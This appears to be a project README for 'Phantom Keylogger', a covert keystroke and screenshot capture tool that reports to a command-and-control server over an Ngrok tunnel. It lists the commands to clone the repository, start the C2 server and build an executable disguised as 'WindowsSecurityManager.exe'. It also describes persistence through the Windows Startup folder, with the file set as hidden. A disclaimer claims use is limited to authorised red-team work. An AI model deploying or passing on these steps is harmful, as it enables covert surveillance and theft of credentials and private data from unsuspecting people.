
Phantom Keylogger is an advanced, stealth-enabled keystroke and visual intelligence gathering system.
Phantom Keylogger is an advanced, stealth-enabled keystroke and visual intelligence gathering system. Built with operational security as the primary objective, this tool provides persistent surveillance capabilities while maintaining minimal footprint on target systems during authorized red team engagements.
AUTHORIZED USE CASES:
- Authorized penetration testing operations
- Red team exercises with written Rules of Engagement
- Security research in controlled environments
- Defensive security control validation
PROHIBITED OPERATIONS:
- Unauthorized surveillance activities
- Illegal intrusion or data exfiltration
- Personal privacy violation
- Any non-authorized offensive operations
OPERATORS ASSUME FULL LEGAL RESPONSIBILITY FOR PROPER DEPLOYMENT
# 1. Clone operational repository
git clone https://github.com/MattiaAlessi/phantom-keylogger
cd phantom-keylogger
# 2. Install operational dependencies
pip install -r requirements.txt
# 3. Deploy C2 server
python server.py
# Generate stealth executable
python build.py
Output: dist/WindowsSecurityManager.exe
Delivery Methods:
# Start the GUI interface
python manager.py
┌─────────────────┐ ┌──────────────────┐ ┌─────────────────┐
│ TARGET │ │ C2 TUNNEL │ │ OPERATOR │
│ │ │ │ │ │
│ ┌─────────────┐│ │ ┌─────────────┐ │ │ ┌─────────────┐│
│ │ Stealth ││ │ │ Ngrok │ │ │ │ Management ││
│ │ Keylogger ├───────►│ Tunnel ├───────►│ Console ││
│ │ ││ │ │ │ │ │ │ ││
│ └─────────────┘│ │ └─────────────┘ │ │ └─────────────┘│
└─────────────────┘ └──────────────────┘ └─────────────────┘
Startup Folder: %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\
Easily accessible by digiting shell:startup in the dialog box (WIN+r)
File Name: WindowsSecurityManager.exe
Attributes: Hidden system file